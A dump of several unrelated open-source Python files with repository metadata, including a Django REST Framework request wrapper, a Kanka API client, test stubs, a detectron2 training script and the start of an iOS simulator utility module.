bcd9fb4c769547febb7375f0cce478484951400e | 1,067 | py | Python | kubernetes/test/test_v1_ceph_fs_persistent_volume_source.py | L3T/python | b6e4ae81a2afb49f668a142eb7d1c6e2571ef478 | [
"Apache-2.0"
] | 2 | 2020-06-21T08:03:18.000Z | 2020-06-21T09:53:29.000Z | kubernetes/test/test_v1_ceph_fs_persistent_volume_source.py | L3T/python | b6e4ae81a2afb49f668a142eb7d1c6e2571ef478 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1_ceph_fs_persistent_volume_source.py | L3T/python | b6e4ae81a2afb49f668a142eb7d1c6e2571ef478 | [
"Apache-2.0"
] | 1 | 2020-12-10T07:28:08.000Z | 2020-12-10T07:28:08.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: release-1.16
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import kubernetes.client
from kubernetes.client.models.v1_ceph_fs_persistent_volume_source import V1CephFSPersistentVolumeSource # noqa: E501
from kubernetes.client.rest import ApiException
class TestV1CephFSPersistentVolumeSource(unittest.TestCase):
"""V1CephFSPersistentVolumeSource unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1CephFSPersistentVolumeSource(self):
"""Test V1CephFSPersistentVolumeSource"""
# FIXME: construct object with mandatory attributes with example values
# model = kubernetes.client.models.v1_ceph_fs_persistent_volume_source.V1CephFSPersistentVolumeSource() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 26.675 | 125 | 0.75164 |
f90b841d0cedfa0d58f032f3d093fe45b45e8dc4 | 14,019 | py | Python | rest_framework/request.py | kouio/django-rest-framework | 088b90a60c67e83efeee79431c3ed9fe7ad8d85d | [
"Unlicense"
] | 1 | 2016-07-16T09:02:38.000Z | 2016-07-16T09:02:38.000Z | rest_framework/request.py | kouio/django-rest-framework | 088b90a60c67e83efeee79431c3ed9fe7ad8d85d | [
"Unlicense"
] | null | null | null | rest_framework/request.py | kouio/django-rest-framework | 088b90a60c67e83efeee79431c3ed9fe7ad8d85d | [
"Unlicense"
] | null | null | null | """
The Request class is used as a wrapper around the standard request object.
The wrapped request then offers a richer API, in particular :
- content automatically parsed according to `Content-Type` header,
and available as `request.DATA`
- full support of PUT method, including support for file uploads
- form overloading of HTTP method, content type and content
"""
from __future__ import unicode_literals
from django.conf import settings
from django.http import QueryDict
from django.http.multipartparser import parse_header
from django.utils.datastructures import MultiValueDict
from rest_framework import HTTP_HEADER_ENCODING
from rest_framework import exceptions
from rest_framework.compat import BytesIO
from rest_framework.settings import api_settings
def is_form_media_type(media_type):
"""
Return True if the media type is a valid form media type.
"""
base_media_type, params = parse_header(media_type.encode(HTTP_HEADER_ENCODING))
return (base_media_type == 'application/x-www-form-urlencoded' or
base_media_type == 'multipart/form-data')
class override_method(object):
"""
A context manager that temporarily overrides the method on a request,
additionally setting the `view.request` attribute.
Usage:
with override_method(view, request, 'POST') as request:
... # Do stuff with `view` and `request`
"""
def __init__(self, view, request, method):
self.view = view
self.request = request
self.method = method
def __enter__(self):
self.view.request = clone_request(self.request, self.method)
return self.view.request
def __exit__(self, *args, **kwarg):
self.view.request = self.request
class Empty(object):
"""
Placeholder for unset attributes.
Cannot use `None`, as that may be a valid value.
"""
pass
def _hasattr(obj, name):
return not getattr(obj, name) is Empty
def clone_request(request, method):
"""
Internal helper method to clone a request, replacing with a different
HTTP method. Used for checking permissions against other methods.
"""
ret = Request(request=request._request,
parsers=request.parsers,
authenticators=request.authenticators,
negotiator=request.negotiator,
parser_context=request.parser_context)
ret._data = request._data
ret._files = request._files
ret._content_type = request._content_type
ret._stream = request._stream
ret._method = method
if hasattr(request, '_user'):
ret._user = request._user
if hasattr(request, '_auth'):
ret._auth = request._auth
if hasattr(request, '_authenticator'):
ret._authenticator = request._authenticator
return ret
class ForcedAuthentication(object):
"""
This authentication class is used if the test client or request factory
forcibly authenticated the request.
"""
def __init__(self, force_user, force_token):
self.force_user = force_user
self.force_token = force_token
def authenticate(self, request):
return (self.force_user, self.force_token)
class Request(object):
"""
Wrapper allowing to enhance a standard `HttpRequest` instance.
Kwargs:
- request(HttpRequest). The original request instance.
- parsers_classes(list/tuple). The parsers to use for parsing the
request content.
- authentication_classes(list/tuple). The authentications used to try
authenticating the request's user.
"""
_METHOD_PARAM = api_settings.FORM_METHOD_OVERRIDE
_CONTENT_PARAM = api_settings.FORM_CONTENT_OVERRIDE
_CONTENTTYPE_PARAM = api_settings.FORM_CONTENTTYPE_OVERRIDE
def __init__(self, request, parsers=None, authenticators=None,
negotiator=None, parser_context=None):
self._request = request
self.parsers = parsers or ()
self.authenticators = authenticators or ()
self.negotiator = negotiator or self._default_negotiator()
self.parser_context = parser_context
self._data = Empty
self._files = Empty
self._method = Empty
self._content_type = Empty
self._stream = Empty
if self.parser_context is None:
self.parser_context = {}
self.parser_context['request'] = self
self.parser_context['encoding'] = request.encoding or settings.DEFAULT_CHARSET
force_user = getattr(request, '_force_auth_user', None)
force_token = getattr(request, '_force_auth_token', None)
if (force_user is not None or force_token is not None):
forced_auth = ForcedAuthentication(force_user, force_token)
self.authenticators = (forced_auth,)
def _default_negotiator(self):
return api_settings.DEFAULT_CONTENT_NEGOTIATION_CLASS()
@property
def method(self):
"""
Returns the HTTP method.
This allows the `method` to be overridden by using a hidden `form`
field on a form POST request.
"""
if not _hasattr(self, '_method'):
self._load_method_and_content_type()
return self._method
@property
def content_type(self):
"""
Returns the content type header.
This should be used instead of `request.META.get('HTTP_CONTENT_TYPE')`,
as it allows the content type to be overridden by using a hidden form
field on a form POST request.
"""
if not _hasattr(self, '_content_type'):
self._load_method_and_content_type()
return self._content_type
@property
def stream(self):
"""
Returns an object that may be used to stream the request content.
"""
if not _hasattr(self, '_stream'):
self._load_stream()
return self._stream
@property
def QUERY_PARAMS(self):
"""
More semantically correct name for request.GET.
"""
return self._request.GET
@property
def DATA(self):
"""
Parses the request body and returns the data.
Similar to usual behaviour of `request.POST`, except that it handles
arbitrary parsers, and also works on methods other than POST (eg PUT).
"""
if not _hasattr(self, '_data'):
self._load_data_and_files()
return self._data
@property
def FILES(self):
"""
Parses the request body and returns any files uploaded in the request.
Similar to usual behaviour of `request.FILES`, except that it handles
arbitrary parsers, and also works on methods other than POST (eg PUT).
"""
if not _hasattr(self, '_files'):
self._load_data_and_files()
return self._files
@property
def user(self):
"""
Returns the user associated with the current request, as authenticated
by the authentication classes provided to the request.
"""
if not hasattr(self, '_user'):
self._authenticate()
return self._user
@user.setter
def user(self, value):
"""
Sets the user on the current request. This is necessary to maintain
compatibility with django.contrib.auth where the user property is
set in the login and logout functions.
"""
self._user = value
@property
def auth(self):
"""
Returns any non-user authentication information associated with the
request, such as an authentication token.
"""
if not hasattr(self, '_auth'):
self._authenticate()
return self._auth
@auth.setter
def auth(self, value):
"""
Sets any non-user authentication information associated with the
request, such as an authentication token.
"""
self._auth = value
@property
def successful_authenticator(self):
"""
Return the instance of the authentication instance class that was used
to authenticate the request, or `None`.
"""
if not hasattr(self, '_authenticator'):
self._authenticate()
return self._authenticator
def _load_data_and_files(self):
"""
Parses the request content into self.DATA and self.FILES.
"""
if not _hasattr(self, '_content_type'):
self._load_method_and_content_type()
if not _hasattr(self, '_data'):
self._data, self._files = self._parse()
def _load_method_and_content_type(self):
"""
Sets the method and content_type, and then check if they've
been overridden.
"""
self._content_type = self.META.get('HTTP_CONTENT_TYPE',
self.META.get('CONTENT_TYPE', ''))
self._perform_form_overloading()
if not _hasattr(self, '_method'):
self._method = self._request.method
# Allow X-HTTP-METHOD-OVERRIDE header
self._method = self.META.get('HTTP_X_HTTP_METHOD_OVERRIDE',
self._method)
def _load_stream(self):
"""
Return the content body of the request, as a stream.
"""
try:
content_length = int(self.META.get('CONTENT_LENGTH',
self.META.get('HTTP_CONTENT_LENGTH')))
except (ValueError, TypeError):
content_length = 0
if content_length == 0:
self._stream = None
else:
self._stream = BytesIO(self.raw_post_data)
def _perform_form_overloading(self):
"""
If this is a form POST request, then we need to check if the method and
content/content_type have been overridden by setting them in hidden
form fields or not.
"""
USE_FORM_OVERLOADING = (
self._METHOD_PARAM or
(self._CONTENT_PARAM and self._CONTENTTYPE_PARAM)
)
# We only need to use form overloading on form POST requests.
if (not USE_FORM_OVERLOADING
or self._request.method != 'POST'
or not is_form_media_type(self._content_type)):
return
# At this point we're committed to parsing the request as form data.
self._data = self._request.POST
self._files = self._request.FILES
# Method overloading - change the method and remove the param from the content.
if (self._METHOD_PARAM and
self._METHOD_PARAM in self._data):
self._method = self._data[self._METHOD_PARAM].upper()
# Content overloading - modify the content type, and force re-parse.
if (self._CONTENT_PARAM and
self._CONTENTTYPE_PARAM and
self._CONTENT_PARAM in self._data and
self._CONTENTTYPE_PARAM in self._data):
self._content_type = self._data[self._CONTENTTYPE_PARAM]
self._stream = BytesIO(self._data[self._CONTENT_PARAM].encode(self.parser_context['encoding']))
self._data, self._files = (Empty, Empty)
def _parse(self):
"""
Parse the request content, returning a two-tuple of (data, files)
May raise an `UnsupportedMediaType`, or `ParseError` exception.
"""
stream = self.stream
media_type = self.content_type
if stream is None or media_type is None:
empty_data = QueryDict('', self._request._encoding)
empty_files = MultiValueDict()
return (empty_data, empty_files)
parser = self.negotiator.select_parser(self, self.parsers)
if not parser:
raise exceptions.UnsupportedMediaType(media_type)
try:
parsed = parser.parse(stream, media_type, self.parser_context)
except:
# If we get an exception during parsing, fill in empty data and
# re-raise. Ensures we don't simply repeat the error when
# attempting to render the browsable renderer response, or when
# logging the request or similar.
self._data = QueryDict('', self._request._encoding)
self._files = MultiValueDict()
raise
# Parser classes may return the raw data, or a
# DataAndFiles object. Unpack the result as required.
try:
return (parsed.data, parsed.files)
except AttributeError:
empty_files = MultiValueDict()
return (parsed, empty_files)
def _authenticate(self):
"""
Attempt to authenticate the request using each authentication instance
in turn.
Returns a three-tuple of (authenticator, user, authtoken).
"""
for authenticator in self.authenticators:
try:
user_auth_tuple = authenticator.authenticate(self)
except exceptions.APIException:
self._not_authenticated()
raise
if not user_auth_tuple is None:
self._authenticator = authenticator
self._user, self._auth = user_auth_tuple
return
self._not_authenticated()
def _not_authenticated(self):
"""
Return a three-tuple of (authenticator, user, authtoken), representing
an unauthenticated request.
By default this will be (None, AnonymousUser, None).
"""
self._authenticator = None
if api_settings.UNAUTHENTICATED_USER:
self._user = api_settings.UNAUTHENTICATED_USER()
else:
self._user = None
if api_settings.UNAUTHENTICATED_TOKEN:
self._auth = api_settings.UNAUTHENTICATED_TOKEN()
else:
self._auth = None
def __getattr__(self, attr):
"""
Proxy other attributes to the underlying HttpRequest object.
"""
return getattr(self._request, attr)
| 33.458234 | 107 | 0.633426 |
4f2e7eef622a598cd1a2eb3a7a5e5e73348f987d | 964 | py | Python | second/builder/voxel_builder.py | Sakura1221/second.pytorch | 7c452e4bef5035f4fc14c1b78d9adde02ac69e00 | [
"MIT"
] | 2 | 2019-03-29T07:06:09.000Z | 2021-05-14T04:29:08.000Z | second/builder/voxel_builder.py | Sakura1221/second.pytorch | 7c452e4bef5035f4fc14c1b78d9adde02ac69e00 | [
"MIT"
] | null | null | null | second/builder/voxel_builder.py | Sakura1221/second.pytorch | 7c452e4bef5035f4fc14c1b78d9adde02ac69e00 | [
"MIT"
] | null | null | null | import numpy as np
from second.core.voxel_generator import VoxelGenerator
from second.protos import voxel_generator_pb2
def build(voxel_config):
"""Builds a tensor dictionary based on the InputReader config.
Args:
input_reader_config: A input_reader_pb2.InputReader object.
Returns:
A tensor dict based on the input_reader_config.
Raises:
ValueError: On invalid input reader proto.
ValueError: If no input paths are specified.
"""
if not isinstance(voxel_config, (voxel_generator_pb2.VoxelGenerator)): # 数据类型检查
raise ValueError('input_reader_config not of type '
'input_reader_pb2.InputReader.')
voxel_generator = VoxelGenerator(
voxel_size=list(voxel_config.voxel_size),
point_cloud_range=list(voxel_config.point_cloud_range),
max_num_points=voxel_config.max_number_of_points_per_voxel,
max_voxels=20000)
return voxel_generator
| 33.241379 | 83 | 0.725104 |
2a6e6ed4e2bfe478b4dc7b94522661c16bd151a7 | 2,198 | py | Python | tests/test_directory.py | ticketmaster/cloud-custodian | 0da3866f70f858895af228cc08706d0909a2a324 | [
"Apache-2.0"
] | null | null | null | tests/test_directory.py | ticketmaster/cloud-custodian | 0da3866f70f858895af228cc08706d0909a2a324 | [
"Apache-2.0"
] | 4 | 2017-02-02T17:08:23.000Z | 2017-05-25T19:33:19.000Z | tests/test_directory.py | ticketmaster/cloud-custodian | 0da3866f70f858895af228cc08706d0909a2a324 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from .common import BaseTest, load_data
class CloudDirectoryTest(BaseTest):
def test_cloud_directory(self):
session_factory = self.replay_flight_data('test_cloud_directory')
client = session_factory().client('clouddirectory')
schema_arn = client.create_schema(Name='gooseberry').get('SchemaArn')
self.addCleanup(client.delete_schema, SchemaArn=schema_arn)
schema_data = load_data('sample-clouddir-schema.json')
client.put_schema_from_json(
SchemaArn=schema_arn,
Document=json.dumps(schema_data))
published_schema = client.publish_schema(
DevelopmentSchemaArn=schema_arn,
Version="1").get('PublishedSchemaArn')
self.addCleanup(client.delete_schema, SchemaArn=published_schema)
dir_info = client.create_directory(
Name='c7n-test', SchemaArn=published_schema)
self.addCleanup(client.delete_directory, DirectoryArn=dir_info['DirectoryArn'])
self.addCleanup(client.disable_directory, DirectoryArn=dir_info['DirectoryArn'])
p = self.load_policy(
{'name': 'cloud-directory',
'resource': 'cloud-directory',
'filters': [
{'type': 'value',
'key': 'State',
'value': 'DELETED',
'op': 'not-equal'},
]
},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
| 37.254237 | 88 | 0.671065 |
b6ed14bd2ccbaed8e5698c289f5af155e492b98d | 5,459 | py | Python | kanka-manager/kankaclient/races.py | davidbradlycurtis/kanka-manager | f44f814c6d9433a40cb1edc558baac12f26b31ad | [
"MIT"
] | null | null | null | kanka-manager/kankaclient/races.py | davidbradlycurtis/kanka-manager | f44f814c6d9433a40cb1edc558baac12f26b31ad | [
"MIT"
] | null | null | null | kanka-manager/kankaclient/races.py | davidbradlycurtis/kanka-manager | f44f814c6d9433a40cb1edc558baac12f26b31ad | [
"MIT"
] | null | null | null | """
Kanka Race API
"""
# pylint: disable=bare-except,super-init-not-called,no-else-break
from __future__ import absolute_import
import logging
import json
from kankaclient.constants import BASE_URL, GET, POST, DELETE, PUT
from kankaclient.base import BaseManager
class RaceAPI(BaseManager):
"""Kanka Race API"""
GET_ALL_CREATE_SINGLE: str
GET_UPDATE_DELETE_SINGLE: str
def __init__(self, token, campaign, verbose=False):
super().__init__(token=token, verbose=verbose)
self.logger = logging.getLogger(self.__class__.__name__)
self.campaign = campaign
self.campaign_id = campaign.get('id')
self.races = list()
global GET_ALL_CREATE_SINGLE
global GET_UPDATE_DELETE_SINGLE
GET_ALL_CREATE_SINGLE = BASE_URL + f'/{self.campaign_id}/races'
GET_UPDATE_DELETE_SINGLE = BASE_URL + f'/{self.campaign_id}/races/%s'
if verbose:
self.logger.setLevel(logging.DEBUG)
def get_all(self) -> list:
"""
Retrieves the available races from Kanka
Raises:
KankaException: Kanka Api Interface Exception
Returns:
races: the requested races
"""
if self.races:
return self.races
races = list()
response = self._request(url=GET_ALL_CREATE_SINGLE, request=GET)
if not response.ok:
self.logger.error('Failed to retrieve races from campaign %s', self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
races = json.loads(response.text).get('data')
self.logger.debug(response.json())
return races
def get(self, name_or_id: str or int) -> dict:
"""
Retrives the desired race by name
Args:
name_or_id (str or int): the name or id of the race
Raises:
KankaException: Kanka Api Interface Exception
Returns:
race: the requested race
"""
race = None
if type(name_or_id) is int:
race = self.get_race_by_id(name_or_id)
else:
races = self.get()
for _race in races:
if _race.get('name') == name_or_id:
race = _race
break
if race is None:
raise self.KankaException(reason=f'Race not found: {name_or_id}', code=404, message='Not Found')
return race
def get_race_by_id(self, id: int) -> dict:
"""
Retrieves the requested race from Kanka
Args:
id (int): the race id
Raises:
KankaException: Kanka Api Interface Exception
Returns:
race: the requested race
"""
response = self._request(url=GET_UPDATE_DELETE_SINGLE % id, request=GET)
if not response.ok:
self.logger.error('Failed to retrieve race %s from campaign %s', id, self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
race = json.loads(response.text).get('data')
self.logger.debug(response.json())
return race
def create(self, race: dict) -> dict:
"""
Creates the provided race in Kanka
Args:
race (dict): the race to create
Raises:
KankaException: Kanka Api Interface Exception
Returns:
race: the created race
"""
response = self._request(url=GET_ALL_CREATE_SINGLE, request=POST, data=json.dumps(race))
if not response.ok:
self.logger.error('Failed to create race %s in campaign %s', race.get('name', 'None'), self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
race = json.loads(response.text).get('data')
self.logger.debug(response.json())
return race
def update(self, race: dict) -> dict:
"""
Updates the provided race in Kanka
Args:
race (dict): the race to create
Raises:
KankaException: Kanka Api Interface Exception
Returns:
race: the updated race
"""
response = self._request(url=GET_UPDATE_DELETE_SINGLE % race.get('id'), request=PUT, data=json.dumps(race))
if not response.ok:
self.logger.error('Failed to update race %s in campaign %s', race.get('name', 'None'), self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
race = json.loads(response.text).get('data')
self.logger.debug(response.json())
return race
def delete(self, id: int) -> bool:
"""
Deletes the provided race in Kanka
Args:
id (int): the race id
Raises:
KankaException: Kanka Api Interface Exception
Returns:
bool: whether the race is successfully deleted
"""
response = self._request(url=GET_UPDATE_DELETE_SINGLE % id, request=DELETE)
if not response.ok:
self.logger.error('Failed to delete race %s in campaign %s', id, self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
self.logger.debug(response)
return True
| 29.192513 | 125 | 0.60817 |
a600e6345d0618db1d9bdc5469027dce4c42a068 | 401 | py | Python | photogallery/asgi.py | erhic/photo_gallery_Django | b6c9b90e628f155c3ad9444c10a974dd22811d64 | [
"MIT"
] | null | null | null | photogallery/asgi.py | erhic/photo_gallery_Django | b6c9b90e628f155c3ad9444c10a974dd22811d64 | [
"MIT"
] | null | null | null | photogallery/asgi.py | erhic/photo_gallery_Django | b6c9b90e628f155c3ad9444c10a974dd22811d64 | [
"MIT"
] | null | null | null | """
ASGI config for photogallery project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'photogallery.settings')
application = get_asgi_application()
| 23.588235 | 78 | 0.790524 |
69b86c54b96a02a42636564e10459c787dd0a00f | 6,148 | py | Python | autorequests/utilities/__init__.py | Hexiro/autorequests | 53923e6f089a34f5cc0babeed305c9b63f8f489b | [
"MIT"
] | 29 | 2021-05-28T20:13:45.000Z | 2022-03-24T22:26:07.000Z | autorequests/utilities/__init__.py | Hexiro/autorequests | 53923e6f089a34f5cc0babeed305c9b63f8f489b | [
"MIT"
] | 5 | 2021-06-19T12:51:56.000Z | 2021-10-17T01:43:18.000Z | autorequests/utilities/__init__.py | Hexiro/autorequests | 53923e6f089a34f5cc0babeed305c9b63f8f489b | [
"MIT"
] | 3 | 2021-06-07T16:27:06.000Z | 2021-07-20T20:49:38.000Z | import functools
import json
import keyword
import sys
import urllib.parse
from typing import List, Dict, Optional, Callable, Union
from .regexp import leading_integer_regexp
# pretty simplistic names tbf
# a lot of these aren't super self explanatory so they have docstring
__all__ = (
"cached_property",
"indent",
"is_pythonic_name",
"extract_cookies",
"merge_dicts",
"format_dict",
"parse_url_encoded",
"written_form",
"unique_name",
"fix_escape_chars",
)
if sys.version_info >= (3, 8):
from functools import cached_property
else:
def cached_property(func: Callable) -> property:
return property(functools.lru_cache()(func))
def indent(data: str, spaces: int = 4) -> str:
"""
indents a code block a set amount of spaces
note: is ~1.5x faster than textwrap.indent(data, " " * spaces)
(from my testing)
"""
indent_block = " " * spaces
return "\n".join((indent_block + line if line else line) for line in data.splitlines())
def is_pythonic_name(text: str) -> bool:
""":returns: true if the string provided is a valid function, class, or var name"""
return text.isidentifier() and not keyword.iskeyword(text)
def extract_cookies(headers: Dict[str, str]) -> Dict[str, str]:
""":returns: a dict of cookies based off the 'cookie' header"""
cookie_header = headers.pop("cookie", None)
if not cookie_header:
return {}
cookie_dict = {}
for cookie in cookie_header.split("; "):
key, value = cookie.split("=", maxsplit=1)
cookie_dict[key] = value
return cookie_dict
def merge_dicts(*dicts: Dict[str, str]) -> Dict[str, str]:
""":returns: a dictionary with the items that all of the dicts in the list share"""
# if there is 0 or 1 dicts, there will be no matches
if len(dicts) <= 1:
return {}
# they ALL have to share an item for it to be accepted,
# therefore we can just loop over the first dict in the list and check if it matches the other items
return {k: v for k, v in dicts[0].items() if all(x.get(k) == v for x in dicts[1:])}
def format_dict(data: dict, indent: Optional[int] = 4, variables: Optional[List[str]] = None) -> str:
"""format a dictionary"""
variables = variables or []
# I'm not sure it's possible to pretty-format this with something like
# pprint, but if it is possible LMK!
formatted = json.dumps(data, indent=indent)
# parse bools and none
# leading space allows us to only match literal false and not "false" string
formatted = formatted.replace(" null", " None")
formatted = formatted.replace(" true", " True")
formatted = formatted.replace(" false", " False")
# parse when key names are the same as value
# leading ": " means that it will replace the value and not the key
for var in variables:
formatted = formatted.replace(f': "{var}"', f": {var}")
return formatted
def parse_url_encoded(data: str) -> Dict[str, str]:
"""parses application/x-www-form-urlencoded and query string params"""
return dict(urllib.parse.parse_qsl(data, keep_blank_values=True))
# kinda screwed if english changes
# if english has progressed please make a pr :pray:
ones_dict = {
"1": "one",
"2": "two",
"3": "three",
"4": "four",
"5": "five",
"6": "six",
"7": "seven",
"8": "eight",
"9": "nine",
}
tens_dict = {
"1": "ten",
"2": "twenty",
"3": "thirty",
"4": "forty",
"5": "fifty",
"6": "sixty",
"7": "seventy",
"8": "eighty",
"9": "ninety",
}
unique_dict = {
"11": "eleven",
"12": "twelve",
"13": "thirteen",
"14": "fourteen",
"15": "fifteen",
"16": "sixteen",
"17": "seventeen",
"18": "eighteen",
"19": "nineteen",
}
def written_form(num: Union[int, str]) -> str:
""":returns: written form of an integer 0-999, or for the leading integer of a string"""
if isinstance(num, str):
# if string is an integer
if num.isdigit():
return written_form(int(num))
# try to parse leading integer
match = leading_integer_regexp.search(num)
if not match:
return num
# if str starts with integer
initial_num = match.group(0)
written_num = written_form(int(initial_num))
rest = num[match.end() :]
return f"{written_num}_{rest}"
if 0 >= num > 999:
raise NotImplementedError("Numbers must be in range 0...999 inclusive")
if num == 0:
return "zero"
# mypy & pycharm don't like string unpacking
full_num = str(num).zfill(3)
hundreds = full_num[0]
tens = full_num[1]
ones = full_num[2]
ones_match = ones_dict.get(ones)
tens_match = tens_dict.get(tens)
unique_match = unique_dict.get(f"{tens}{ones}")
hundreds_match = ones_dict.get(hundreds)
written = []
if hundreds_match:
written.append(f"{hundreds_match}_hundred")
if unique_match:
written.append(unique_match)
elif tens_match and ones_match:
written.append(f"{tens_match}_{ones_match}")
elif tens_match:
written.append(tens_match)
elif ones_match:
written.append(ones_match)
return "_and_".join(written)
def unique_name(name: str, other_names: List[str]) -> str:
""":returns a unique name based on the name passed and the taken names"""
matches = [item for item in other_names if item.startswith(name)]
if not any(matches):
return name
matched_names_length = len(matches)
if matched_names_length > 999:
raise NotImplementedError(">999 methods with similar names not supported")
written = written_form(matched_names_length + 1)
return name + "_" + written
def fix_escape_chars(text: str) -> str:
"""
replaces escaped \\ followed by a letter to the appropriate char
ignore/replace are kind of just guesses at what i think would be best
if there is a more logical reason to use something else LMK!
(ex. "\\t" --> "\t")
"""
return text.encode(encoding="utf8", errors="ignore").decode(encoding="unicode_escape", errors="replace")
| 31.208122 | 108 | 0.638907 |
0972e326cedc338e7cce0ba017fc4b5b8c1d5cb6 | 1,687 | py | Python | tmp_colab.py | natureyoo/siamese-triplet | 83c916e30fa40d890febeffc25cf6bedf542fd3f | [
"BSD-3-Clause"
] | null | null | null | tmp_colab.py | natureyoo/siamese-triplet | 83c916e30fa40d890febeffc25cf6bedf542fd3f | [
"BSD-3-Clause"
] | null | null | null | tmp_colab.py | natureyoo/siamese-triplet | 83c916e30fa40d890febeffc25cf6bedf542fd3f | [
"BSD-3-Clause"
] | 1 | 2020-12-08T02:20:25.000Z | 2020-12-08T02:20:25.000Z | import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()
# import some common libraries
import numpy as np
import cv2
import random
# import some common detectron2 utilities
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor, DefaultTrainer
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import MetadataCatalog
from detectron2.data.datasets import register_coco_instances
from detectron2.modeling import build_model
import pkg_resources
import os
import torch.distributed as dist
from detectron2.utils import comm
register_coco_instances("deepfashion2_train", {}, "/second/DeepFashion2/coco_format/instance_train.json", "/second/DeepFashion2/train/image")
register_coco_instances("deepfashion2_val", {}, "/second/DeepFashion2/coco_format/instance_val.json", "/second/DeepFashion2/val/image/")
config_path = "COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml"
cfg_file = pkg_resources.resource_filename("detectron2.model_zoo", os.path.join("configs", config_path))
cfg = get_cfg()
cfg.merge_from_file(cfg_file)
cfg.DATASETS.TRAIN = ("deepfashion2_train",)
cfg.DATASETS.TEST = ("deepfashion2_val",)
cfg.DATALOADER.NUM_WORKERS = 2
cfg.MODEL.WEIGHTS = '../output/model_0029999.pth'
cfg.SOLVER.IMS_PER_BATCH = 3
cfg.SOLVER.BASE_LR = 0.00025
cfg.SOLVER.MAX_ITER = 3000
cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128
cfg.MODEL.ROI_HEADS.NUM_CLASSES = 13
# model_zoo.get_checkpoint_url("COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml") # Let training initialize from model zoo
trainer = DefaultTrainer(cfg)
trainer.resume_or_load(resume=False)
trainer.train() | 37.488889 | 141 | 0.827504 |
cd5a7cdf23a51930db7a193f0cdcccfd8786efc7 | 721 | py | Python | web_crawler/tasks/__init__.py | RYU-BB/web_crawling | 0cd7745aba1f97f7c3c924e4ea1b602d7e0a0453 | [
"Apache-2.0"
] | null | null | null | web_crawler/tasks/__init__.py | RYU-BB/web_crawling | 0cd7745aba1f97f7c3c924e4ea1b602d7e0a0453 | [
"Apache-2.0"
] | null | null | null | web_crawler/tasks/__init__.py | RYU-BB/web_crawling | 0cd7745aba1f97f7c3c924e4ea1b602d7e0a0453 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021, Myeonghyeon Ryu. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from web_crawler.tasks.naver_blog import NaverBlogCrawler
from web_crawler.tasks.daum_blog import DaumBlogCrawler
| 42.411765 | 74 | 0.78086 |
729e37095ca86f3731d08c7a84dfb46d879bdde9 | 26,475 | py | Python | simulator_control/simulator_util.py | jverkoey/xctestrunner | 2f88d59c3c28935a124967dc382f413640d2868c | [
"Apache-2.0"
] | 1 | 2020-11-10T00:38:14.000Z | 2020-11-10T00:38:14.000Z | simulator_control/simulator_util.py | keith/xctestrunner | 586a51b90cfbd13ef23a101f719d64bd0fe0ec60 | [
"Apache-2.0"
] | 1 | 2019-12-05T22:06:33.000Z | 2019-12-05T22:18:25.000Z | simulator_control/simulator_util.py | woshimaliang/xctestrunner | b0cba583c03fe1af4b18ccf17d0c728e5b01648d | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The utility class for simulator."""
import json
import logging
import os
import pwd
import re
import shutil
import subprocess
import time
from xctestrunner.shared import ios_constants
from xctestrunner.shared import ios_errors
from xctestrunner.shared import plist_util
from xctestrunner.shared import xcode_info_util
from xctestrunner.simulator_control import simtype_profile
_SIMULATOR_STATES_MAPPING = {
0: ios_constants.SimState.CREATING,
1: ios_constants.SimState.SHUTDOWN,
3: ios_constants.SimState.BOOTED
}
_PREFIX_RUNTIME_ID = 'com.apple.CoreSimulator.SimRuntime.'
_SIM_OPERATION_MAX_ATTEMPTS = 3
_SIMCTL_MAX_ATTEMPTS = 2
_SIMULATOR_CREATING_TO_SHUTDOWN_TIMEOUT_SEC = 10
_SIMULATOR_SHUTDOWN_TIMEOUT_SEC = 30
_SIM_ERROR_RETRY_INTERVAL_SEC = 2
